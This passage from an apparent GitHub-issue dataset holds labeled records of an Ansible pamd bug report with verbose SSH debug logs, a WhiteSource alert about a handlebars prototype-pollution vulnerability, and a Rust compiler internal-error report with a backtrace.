User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'( umask 77 && mkdir -p "` echo /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715 `" && echo ansible-tmp-1540760027.205646-268627155789715="` echo /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715 `" ) && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'ansible-tmp-1540760027.205646-268627155789715=/home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715\n', b'OpenSSH_7.7p1, 
LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') Using module file /usr/local/Cellar/ansible/2.7.1/libexec/lib/python3.7/site-packages/ansible/modules/system/pamd.py <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> PUT /Users/user/.ansible/tmp/ansible-local-432871i84_61/tmplsws36wp TO /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC sftp -b - -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 '[ec2-54-00-00-00.eu-central-1.compute.amazonaws.com]' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'sftp> put /Users/user/.ansible/tmp/ansible-local-432871i84_61/tmplsws36wp /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: 
mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug2: Remote version: 3\r\ndebug2: Server supports extension "posix-rename@openssh.com" revision 1\r\ndebug2: Server supports extension "statvfs@openssh.com" revision 2\r\ndebug2: Server supports extension "fstatvfs@openssh.com" revision 2\r\ndebug2: Server supports extension "hardlink@openssh.com" revision 1\r\ndebug2: Server supports extension "fsync@openssh.com" revision 1\r\ndebug3: Sent message fd 3 T:16 I:1\r\ndebug3: SSH_FXP_REALPATH . -> /home/ubuntu size 0\r\ndebug3: Looking up /Users/user/.ansible/tmp/ansible-local-432871i84_61/tmplsws36wp\r\ndebug3: Sent message fd 3 T:17 I:2\r\ndebug3: Received stat reply T:101 I:2\r\ndebug1: Couldn\'t stat remote file: No such file or directory\r\ndebug3: Sent message SSH2_FXP_OPEN I:3 P:/home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py\r\ndebug3: Sent message SSH2_FXP_WRITE I:4 O:0 S:32768\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: In write loop, ack for 4 32768 bytes at 0\r\ndebug3: Sent message SSH2_FXP_WRITE I:5 O:32768 S:32768\r\ndebug3: Sent message SSH2_FXP_WRITE I:6 O:65536 S:11453\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: In write loop, ack for 5 32768 bytes at 32768\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: In write loop, ack for 6 11453 bytes at 65536\r\ndebug3: Sent message SSH2_FXP_CLOSE I:4\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC 
ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'chmod u+x /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/ /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 -tt ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'sudo -H -S -n -u 
root /bin/sh -c '"'"'"'"'"'"'"'"'echo BECOME-SUCCESS-hgdzwkselssyvarkpelisbqztplobhng; /usr/bin/python3 /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py'"'"'"'"'"'"'"'"' && sleep 0'"'"'' Escalation succeeded <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'\r\n{"changed": false, "ansible_facts": {"pamd": {"changed": false, "change_count": 0, "action": "updated", "backupdest": ""}}, "invocation": {"module_args": {"type": "session", "name": "common-session", "module_path": "pam_limits.so", "control": "required", "backup": true, "state": "updated", "path": "/etc/pam.d", "new_type": null, "new_control": null, "new_module_path": null, "module_arguments": null}}}\r\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\nShared connection to ec2-54-00-00-00.eu-central-1.compute.amazonaws.com closed.\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="/Users/user/.ssh/minerva-prime/minerva-frankfurt-default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o 
PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'rm -f -r /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/ > /dev/null 2>&1 && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') ok: [test1] => { "ansible_facts": { "pamd": { "action": "updated", "backupdest": "", "change_count": 0, "changed": false } }, "changed": false, "invocation": { "module_args": { "backup": true, "control": "required", "module_arguments": null, "module_path": "pam_limits.so", "name": "common-session", "new_control": null, "new_module_path": null, "new_type": null, "path": "/etc/pam.d", "state": "updated", "type": "session" } } } META: ran handlers META: ran handlers ```
main
pamd module doesn t update common session file summary i am trying to add a pam d module to common session using pamd module task pass ok nothing is happening issue type bug report component name pamd ansible version ansible config file none configured module search path ansible python module location usr local cellar ansible libexec lib site packages ansible executable location usr local bin ansible python version default sep configuration host key checking env ansible host key checking false os environment target os ubuntu lts running on aws steps to reproduce run playbook with a role that runs this task yaml name added pam limits module become yes pamd type session name common session module path pam limits so control required backup yes expected results expect seeing in etc pam d common session the entry session required pam limits so actual results no entry added in etc pam d common session task task path users user github user ansible roles oslimits tasks session yml establish ssh connection for user ubuntu ssh exec ssh vvv c o controlmaster auto o controlpersist o stricthostkeychecking no o identityfile default pem o kbdinteractiveauthentication no o preferredauthentications gssapi with mic gssapi keyex hostbased publickey o passwordauthentication no o user ubuntu o connecttimeout o controlpath users user ansible cp eu central compute amazonaws com bin sh c echo ubuntu sleep b home ubuntu n b openssh libressl r reading configuration data etc ssh ssh config r etc ssh ssh config line applying options for r auto mux trying existing master r fd setting o nonblock r mux client hello exchange master version r mux client forwards request forwardings local remote r mux client request session entering r mux client request alive entering r mux client request alive done pid r mux client request session session request sent r mux client request session master session id r mux client read packet read header failed broken pipe r received exit status from master r n 
establish ssh connection for user ubuntu ssh exec ssh vvv c o controlmaster auto o controlpersist o stricthostkeychecking no o identityfile default pem o kbdinteractiveauthentication no o preferredauthentications gssapi with mic gssapi keyex hostbased publickey o passwordauthentication no o user ubuntu o connecttimeout o controlpath users user ansible cp eu central compute amazonaws com bin sh c umask mkdir p echo home ubuntu ansible tmp ansible tmp echo ansible tmp echo home ubuntu ansible tmp ansible tmp sleep b ansible tmp home ubuntu ansible tmp ansible tmp n b openssh libressl r reading configuration data etc ssh ssh config r etc ssh ssh config line applying options for r auto mux trying existing master r fd setting o nonblock r mux client hello exchange master version r mux client forwards request forwardings local remote r mux client request session entering r mux client request alive entering r mux client request alive done pid r mux client request session session request sent r mux client request session master session id r mux client read packet read header failed broken pipe r received exit status from master r n using module file usr local cellar ansible libexec lib site packages ansible modules system pamd py put users user ansible tmp ansible local to home ubuntu ansible tmp ansible tmp ansiballz pamd py ssh exec sftp b vvv c o controlmaster auto o controlpersist o stricthostkeychecking no o identityfile default pem o kbdinteractiveauthentication no o preferredauthentications gssapi with mic gssapi keyex hostbased publickey o passwordauthentication no o user ubuntu o connecttimeout o controlpath users user ansible cp b sftp put users user ansible tmp ansible local home ubuntu ansible tmp ansible tmp ansiballz pamd py n b openssh libressl r reading configuration data etc ssh ssh config r etc ssh ssh config line applying options for r auto mux trying existing master r fd setting o nonblock r mux client hello exchange master version r mux client forwards 
request forwardings local remote r mux client request session entering r mux client request alive entering r mux client request alive done pid r mux client request session session request sent r mux client request session master session id r remote version r server supports extension posix rename openssh com revision r server supports extension statvfs openssh com revision r server supports extension fstatvfs openssh com revision r server supports extension hardlink openssh com revision r server supports extension fsync openssh com revision r sent message fd t i r ssh fxp realpath home ubuntu size r looking up users user ansible tmp ansible local r sent message fd t i r received stat reply t i r couldn t stat remote file no such file or directory r sent message fxp open i p home ubuntu ansible tmp ansible tmp ansiballz pamd py r sent message fxp write i o s r fxp status r in write loop ack for bytes at r sent message fxp write i o s r sent message fxp write i o s r fxp status r in write loop ack for bytes at r fxp status r in write loop ack for bytes at r sent message fxp close i r fxp status r mux client read packet read header failed broken pipe r received exit status from master r n establish ssh connection for user ubuntu ssh exec ssh vvv c o controlmaster auto o controlpersist o stricthostkeychecking no o identityfile default pem o kbdinteractiveauthentication no o preferredauthentications gssapi with mic gssapi keyex hostbased publickey o passwordauthentication no o user ubuntu o connecttimeout o controlpath users user ansible cp eu central compute amazonaws com bin sh c chmod u x home ubuntu ansible tmp ansible tmp home ubuntu ansible tmp ansible tmp ansiballz pamd py sleep b b openssh libressl r reading configuration data etc ssh ssh config r etc ssh ssh config line applying options for r auto mux trying existing master r fd setting o nonblock r mux client hello exchange master version r mux client forwards request forwardings local remote r mux client 
request session entering r mux client request alive entering r mux client request alive done pid r mux client request session session request sent r mux client request session master session id r mux client read packet read header failed broken pipe r received exit status from master r n establish ssh connection for user ubuntu ssh exec ssh vvv c o controlmaster auto o controlpersist o stricthostkeychecking no o identityfile default pem o kbdinteractiveauthentication no o preferredauthentications gssapi with mic gssapi keyex hostbased publickey o passwordauthentication no o user ubuntu o connecttimeout o controlpath users user ansible cp tt eu central compute amazonaws com bin sh c sudo h s n u root bin sh c echo become success hgdzwkselssyvarkpelisbqztplobhng usr bin home ubuntu ansible tmp ansible tmp ansiballz pamd py sleep escalation succeeded b r n changed false ansible facts pamd changed false change count action updated backupdest invocation module args type session name common session module path pam limits so control required backup true state updated path etc pam d new type null new control null new module path null module arguments null r n b openssh libressl r reading configuration data etc ssh ssh config r etc ssh ssh config line applying options for r auto mux trying existing master r fd setting o nonblock r mux client hello exchange master version r mux client forwards request forwardings local remote r mux client request session entering r mux client request alive entering r mux client request alive done pid r mux client request session session request sent r mux client request session master session id r mux client read packet read header failed broken pipe r received exit status from master r nshared connection to eu central compute amazonaws com closed r n establish ssh connection for user ubuntu ssh exec ssh vvv c o controlmaster auto o controlpersist o stricthostkeychecking no o identityfile users user ssh minerva prime minerva frankfurt 
default pem o kbdinteractiveauthentication no o preferredauthentications gssapi with mic gssapi keyex hostbased publickey o passwordauthentication no o user ubuntu o connecttimeout o controlpath users user ansible cp eu central compute amazonaws com bin sh c rm f r home ubuntu ansible tmp ansible tmp dev null sleep b b openssh libressl r reading configuration data etc ssh ssh config r etc ssh ssh config line applying options for r auto mux trying existing master r fd setting o nonblock r mux client hello exchange master version r mux client forwards request forwardings local remote r mux client request session entering r mux client request alive entering r mux client request alive done pid r mux client request session session request sent r mux client request session master session id r mux client read packet read header failed broken pipe r received exit status from master r n ok ansible facts pamd action updated backupdest change count changed false changed false invocation module args backup true control required module arguments null module path pam limits so name common session new control null new module path null new type null path etc pam d state updated type session meta ran handlers meta ran handlers
1
199,950
22,739,345,983
IssuesEvent
2022-07-07 01:03:50
howlr-me/howlr-front
https://api.github.com/repos/howlr-me/howlr-front
opened
WS-2020-0450 (Medium) detected in handlebars-4.1.2.tgz
security vulnerability
## WS-2020-0450 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>handlebars-4.1.2.tgz</b></p></summary> <p>Handlebars provides the power necessary to let you build semantic templates effectively with no frustration</p> <p>Library home page: <a href="https://registry.npmjs.org/handlebars/-/handlebars-4.1.2.tgz">https://registry.npmjs.org/handlebars/-/handlebars-4.1.2.tgz</a></p> <p>Path to dependency file: /howlr-front/package.json</p> <p>Path to vulnerable library: /node_modules/handlebars/package.json</p> <p> Dependency Hierarchy: - react-scripts-3.0.1.tgz (Root Library) - jest-24.7.1.tgz - jest-cli-24.8.0.tgz - core-24.8.0.tgz - reporters-24.8.0.tgz - istanbul-reports-2.2.6.tgz - :x: **handlebars-4.1.2.tgz** (Vulnerable Library) <p>Found in HEAD commit: <a href="https://api.github.com/repos/howlr-me/howlr-front/commits/aefbb4fb9899e9aedf8d3f10a36a31a07cc365dc">aefbb4fb9899e9aedf8d3f10a36a31a07cc365dc</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> Handlebars before 4.6.0 vulnerable to Prototype Pollution. Prototype access to the template engine allows for potential code execution, which may lead to Denial Of Service (DoS). 
<p>Publish Date: 2020-01-09 <p>URL: <a href=https://github.com/handlebars-lang/handlebars.js/commit/33a3b46bc205f768f8edbc67241c68591fe3472c>WS-2020-0450</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Release Date: 2020-01-09</p> <p>Fix Resolution (handlebars): 4.6.0</p> <p>Direct dependency fix Resolution (react-scripts): 3.1.0</p> </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
WS-2020-0450 (Medium) detected in handlebars-4.1.2.tgz - ## WS-2020-0450 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>handlebars-4.1.2.tgz</b></p></summary> <p>Handlebars provides the power necessary to let you build semantic templates effectively with no frustration</p> <p>Library home page: <a href="https://registry.npmjs.org/handlebars/-/handlebars-4.1.2.tgz">https://registry.npmjs.org/handlebars/-/handlebars-4.1.2.tgz</a></p> <p>Path to dependency file: /howlr-front/package.json</p> <p>Path to vulnerable library: /node_modules/handlebars/package.json</p> <p> Dependency Hierarchy: - react-scripts-3.0.1.tgz (Root Library) - jest-24.7.1.tgz - jest-cli-24.8.0.tgz - core-24.8.0.tgz - reporters-24.8.0.tgz - istanbul-reports-2.2.6.tgz - :x: **handlebars-4.1.2.tgz** (Vulnerable Library) <p>Found in HEAD commit: <a href="https://api.github.com/repos/howlr-me/howlr-front/commits/aefbb4fb9899e9aedf8d3f10a36a31a07cc365dc">aefbb4fb9899e9aedf8d3f10a36a31a07cc365dc</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> Handlebars before 4.6.0 vulnerable to Prototype Pollution. Prototype access to the template engine allows for potential code execution, which may lead to Denial Of Service (DoS). 
<p>Publish Date: 2020-01-09 <p>URL: <a href=https://github.com/handlebars-lang/handlebars.js/commit/33a3b46bc205f768f8edbc67241c68591fe3472c>WS-2020-0450</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Release Date: 2020-01-09</p> <p>Fix Resolution (handlebars): 4.6.0</p> <p>Direct dependency fix Resolution (react-scripts): 3.1.0</p> </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_main
ws medium detected in handlebars tgz ws medium severity vulnerability vulnerable library handlebars tgz handlebars provides the power necessary to let you build semantic templates effectively with no frustration library home page a href path to dependency file howlr front package json path to vulnerable library node modules handlebars package json dependency hierarchy react scripts tgz root library jest tgz jest cli tgz core tgz reporters tgz istanbul reports tgz x handlebars tgz vulnerable library found in head commit a href vulnerability details handlebars before vulnerable to prototype pollution prototype access to the template engine allows for potential code execution which may lead to denial of service dos publish date url a href cvss score details base score metrics exploitability metrics attack vector local attack complexity low privileges required none user interaction required scope unchanged impact metrics confidentiality impact none integrity impact none availability impact high for more information on scores click a href suggested fix type upgrade version release date fix resolution handlebars direct dependency fix resolution react scripts step up your open source security game with mend
0
179,456
13,881,761,957
IssuesEvent
2020-10-18 02:28:21
rust-lang/rust
https://api.github.com/repos/rust-lang/rust
closed
unexpected panic when trait not implemented
C-bug E-needs-test I-ICE P-medium T-compiler glacier
### Code ```Rust pub trait Callback { fn cb(); } pub trait Processing { type Call:Callback; } fn f<P:Processing+?Sized>() { P::Call::cb(); } fn main() { struct MyCall; f::<dyn Processing<Call=MyCall>>(); } ``` ### Meta <!-- If you're using the stable version of the compiler, you should also check if the bug also exists in the beta or nightly versions. --> `rustc --version --verbose`: ``` rustc 1.45.2 (d3fb005a3 2020-07-31) binary: rustc commit-hash: d3fb005a39e62501b8b0b356166e515ae24e2e54 commit-date: 2020-07-31 host: x86_64-apple-darwin release: 1.45.2 LLVM version: 10.0 ``` ### Error output ``` rustc src/main.rs error: internal compiler error: src/librustc_trait_selection/traits/codegen/mod.rs:62: Encountered error `Unimplemented` selecting `Binder(<main::MyCall as Callback>)` during codegen ``` <!-- Include a backtrace in the code block by setting `RUST_BACKTRACE=1` in your environment. E.g. `RUST_BACKTRACE=1 cargo build`. --> <details><summary><strong>Backtrace</strong></summary> <p> ``` thread 'rustc' panicked at 'Box<Any>', src/librustc_errors/lib.rs:907:9 stack backtrace: 0: <std::sys_common::backtrace::_print::DisplayBacktrace as core::fmt::Display>::fmt 1: core::fmt::write 2: std::io::Write::write_fmt 3: std::panicking::default_hook::{{closure}} 4: std::panicking::default_hook 5: rustc_driver::report_ice 6: std::panicking::rust_panic_with_hook 7: std::panicking::begin_panic 8: rustc_errors::HandlerInner::bug 9: rustc_errors::Handler::bug 10: rustc_middle::util::bug::opt_span_bug_fmt::{{closure}} 11: rustc_middle::ty::context::tls::with_opt::{{closure}} 12: rustc_middle::ty::context::tls::with_opt 13: rustc_middle::util::bug::opt_span_bug_fmt 14: rustc_middle::util::bug::bug_fmt 15: rustc_middle::ty::context::GlobalCtxt::enter_local 16: rustc_trait_selection::traits::codegen::codegen_fulfill_obligation 17: rustc_middle::ty::query::<impl rustc_query_system::query::config::QueryAccessors<rustc_middle::ty::context::TyCtxt> for 
rustc_middle::ty::query::queries::codegen_fulfill_obligation>::compute 18: rustc_query_system::dep_graph::graph::DepGraph<K>::with_task_impl 19: rustc_data_structures::stack::ensure_sufficient_stack 20: rustc_query_system::query::plumbing::get_query_impl 21: rustc_ty::instance::resolve_instance 22: rustc_middle::ty::query::<impl rustc_query_system::query::config::QueryAccessors<rustc_middle::ty::context::TyCtxt> for rustc_middle::ty::query::queries::resolve_instance>::compute 23: rustc_query_system::dep_graph::graph::DepGraph<K>::with_task_impl 24: rustc_data_structures::stack::ensure_sufficient_stack 25: rustc_query_system::query::plumbing::get_query_impl 26: rustc_middle::ty::instance::Instance::resolve 27: <rustc_mir::monomorphize::collector::MirNeighborCollector as rustc_middle::mir::visit::Visitor>::visit_terminator_kind 28: rustc_mir::monomorphize::collector::collect_neighbours 29: rustc_mir::monomorphize::collector::collect_items_rec 30: rustc_mir::monomorphize::collector::collect_items_rec 31: rustc_mir::monomorphize::collector::collect_crate_mono_items 32: rustc_mir::monomorphize::partitioning::collect_and_partition_mono_items 33: rustc_middle::ty::query::<impl rustc_query_system::query::config::QueryAccessors<rustc_middle::ty::context::TyCtxt> for rustc_middle::ty::query::queries::collect_and_partition_mono_items>::compute 34: rustc_query_system::dep_graph::graph::DepGraph<K>::with_task_impl 35: rustc_data_structures::stack::ensure_sufficient_stack 36: rustc_query_system::query::plumbing::get_query_impl 37: rustc_codegen_ssa::base::codegen_crate 38: <rustc_codegen_llvm::LlvmCodegenBackend as rustc_codegen_ssa::traits::backend::CodegenBackend>::codegen_crate 39: rustc_interface::passes::start_codegen 40: rustc_middle::ty::context::tls::enter_global 41: rustc_interface::queries::Queries::ongoing_codegen 42: rustc_interface::interface::run_compiler_in_existing_thread_pool 43: rustc_ast::attr::with_globals note: Some details are omitted, run with 
`RUST_BACKTRACE=full` for a verbose backtrace. note: the compiler unexpectedly panicked. this is a bug. note: we would appreciate a bug report: https://github.com/rust-lang/rust/blob/master/CONTRIBUTING.md#bug-reports note: rustc 1.45.2 (d3fb005a3 2020-07-31) running on x86_64-apple-darwin query stack during panic: #0 [codegen_fulfill_obligation] checking if `Callback` fulfills its obligations #1 [resolve_instance] resolving instance `<main::MyCall as Callback>::cb` #2 [collect_and_partition_mono_items] collect_and_partition_mono_items end of query stack error: aborting due to previous error ``` </p> </details>
1.0
unexpected panic when trait not implemented - ### Code ```Rust pub trait Callback { fn cb(); } pub trait Processing { type Call:Callback; } fn f<P:Processing+?Sized>() { P::Call::cb(); } fn main() { struct MyCall; f::<dyn Processing<Call=MyCall>>(); } ``` ### Meta <!-- If you're using the stable version of the compiler, you should also check if the bug also exists in the beta or nightly versions. --> `rustc --version --verbose`: ``` rustc 1.45.2 (d3fb005a3 2020-07-31) binary: rustc commit-hash: d3fb005a39e62501b8b0b356166e515ae24e2e54 commit-date: 2020-07-31 host: x86_64-apple-darwin release: 1.45.2 LLVM version: 10.0 ``` ### Error output ``` rustc src/main.rs error: internal compiler error: src/librustc_trait_selection/traits/codegen/mod.rs:62: Encountered error `Unimplemented` selecting `Binder(<main::MyCall as Callback>)` during codegen ``` <!-- Include a backtrace in the code block by setting `RUST_BACKTRACE=1` in your environment. E.g. `RUST_BACKTRACE=1 cargo build`. --> <details><summary><strong>Backtrace</strong></summary> <p> ``` thread 'rustc' panicked at 'Box<Any>', src/librustc_errors/lib.rs:907:9 stack backtrace: 0: <std::sys_common::backtrace::_print::DisplayBacktrace as core::fmt::Display>::fmt 1: core::fmt::write 2: std::io::Write::write_fmt 3: std::panicking::default_hook::{{closure}} 4: std::panicking::default_hook 5: rustc_driver::report_ice 6: std::panicking::rust_panic_with_hook 7: std::panicking::begin_panic 8: rustc_errors::HandlerInner::bug 9: rustc_errors::Handler::bug 10: rustc_middle::util::bug::opt_span_bug_fmt::{{closure}} 11: rustc_middle::ty::context::tls::with_opt::{{closure}} 12: rustc_middle::ty::context::tls::with_opt 13: rustc_middle::util::bug::opt_span_bug_fmt 14: rustc_middle::util::bug::bug_fmt 15: rustc_middle::ty::context::GlobalCtxt::enter_local 16: rustc_trait_selection::traits::codegen::codegen_fulfill_obligation 17: rustc_middle::ty::query::<impl 
rustc_query_system::query::config::QueryAccessors<rustc_middle::ty::context::TyCtxt> for rustc_middle::ty::query::queries::codegen_fulfill_obligation>::compute 18: rustc_query_system::dep_graph::graph::DepGraph<K>::with_task_impl 19: rustc_data_structures::stack::ensure_sufficient_stack 20: rustc_query_system::query::plumbing::get_query_impl 21: rustc_ty::instance::resolve_instance 22: rustc_middle::ty::query::<impl rustc_query_system::query::config::QueryAccessors<rustc_middle::ty::context::TyCtxt> for rustc_middle::ty::query::queries::resolve_instance>::compute 23: rustc_query_system::dep_graph::graph::DepGraph<K>::with_task_impl 24: rustc_data_structures::stack::ensure_sufficient_stack 25: rustc_query_system::query::plumbing::get_query_impl 26: rustc_middle::ty::instance::Instance::resolve 27: <rustc_mir::monomorphize::collector::MirNeighborCollector as rustc_middle::mir::visit::Visitor>::visit_terminator_kind 28: rustc_mir::monomorphize::collector::collect_neighbours 29: rustc_mir::monomorphize::collector::collect_items_rec 30: rustc_mir::monomorphize::collector::collect_items_rec 31: rustc_mir::monomorphize::collector::collect_crate_mono_items 32: rustc_mir::monomorphize::partitioning::collect_and_partition_mono_items 33: rustc_middle::ty::query::<impl 